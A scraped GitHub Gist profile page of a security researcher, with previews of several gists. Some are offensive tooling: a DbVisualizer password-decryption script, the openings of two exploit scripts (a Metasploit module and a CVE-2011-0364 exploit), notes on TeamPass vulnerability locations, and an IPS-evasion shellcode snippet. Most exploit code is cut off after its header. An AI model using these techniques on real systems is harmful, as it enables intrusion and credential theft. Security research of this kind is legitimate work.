Skip to content

Instantly share code, notes, and snippets.

Gerry Eisenhaur gerry

Block or report user

Report or block gerry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gerry
gerry / decrypt_dbvis.py
Last active Apr 20, 2018
A quick hack to extract and decrypt credentials from DbVisualizer config files.
View decrypt_dbvis.py
#!/usr/bin/env python
# decrypt_dbvis.py ~ gerry@twitter.com
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
"""
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/decrypt_dbvis.py <config filename>
@gerry
gerry / cracking_rig.md
Created Aug 26, 2016
My current cracking rig (4x GTX980ti's)
View cracking_rig.md
@gerry
gerry / hashcat_benchmark.txt
Created Aug 26, 2016
A hashcat benchmark of my current cracking rig (4x GTX980Ti's)
View hashcat_benchmark.txt
hashcat (v3.10-3-g13cbe42) starting in benchmark-mode...
OpenCL Platform #1: NVIDIA Corporation
======================================
- Device #1: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #2: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #3: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #4: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
Hashtype: MD4
@gerry
gerry / weathermap_editor_exec.rb
Created Aug 23, 2016
Weathermap Editor (cacti plugin) Arbitrary Code Execution
View weathermap_editor_exec.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@gerry
gerry / st_upload-exploit.py
Last active Aug 23, 2016
Exploit for CVE-2011-0364
View st_upload-exploit.py
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
View teampass_notes.md

Arbitrary file data write (leading to RCE)

./sources/export.queries.php:471: $outstream = fopen($_POST['file'], "a"); (place php in item description) ./sources/admin.queries.php:1110: $fh = fopen($tmp_skfile, 'w'); (admin required)

SQLi

./sources/views.queries.php:437: ORDER BY ".$_POST['order']." ".$_POST['direction']." (admin required)

No Authz on file download:

./sources/downloadFile.php:47: $fp = fopen($_SESSION['settings']['path_to_upload_folder'].'/'.$result['file'], 'rb');

@gerry
gerry / evasions.py
Created Apr 18, 2010
collection of various IPS evasions
View evasions.py
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
View kill-switch.sh
#!/bin/sh -e
DEFAULT_IFACE=enp0s3
LOCAL_NET=$(ip -o -f inet addr show $DEFAULT_IFACE | awk '{print $4}')
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
ufw --force reset
ufw default deny outgoing
ufw default deny incoming
ufw allow out on tun0 from any to any
ufw allow in on tun0 from any to any
View update-pia-hosts.sh
#!/bin/sh -e
HOSTNAME=us-california.privateinternetaccess.com
# host us-california.privateinternetaccess.com|cut -d' ' -f4|tr \\n ,
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
IP=$(echo $HOST_IPS | tr , \\n | shuf - | head -n 1)
if grep -q $HOSTNAME /etc/hosts; then
sed -i "s/.*$HOSTNAME/$IP $HOSTNAME/" /etc/hosts
else
echo $IP $HOSTNAME >> /etc/hosts
@gerry
gerry / import_nessus_nbe.diff
Created Feb 27, 2013
Quick fix for importing Nessus NBE files
View import_nessus_nbe.diff
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
You can’t perform that action at this time.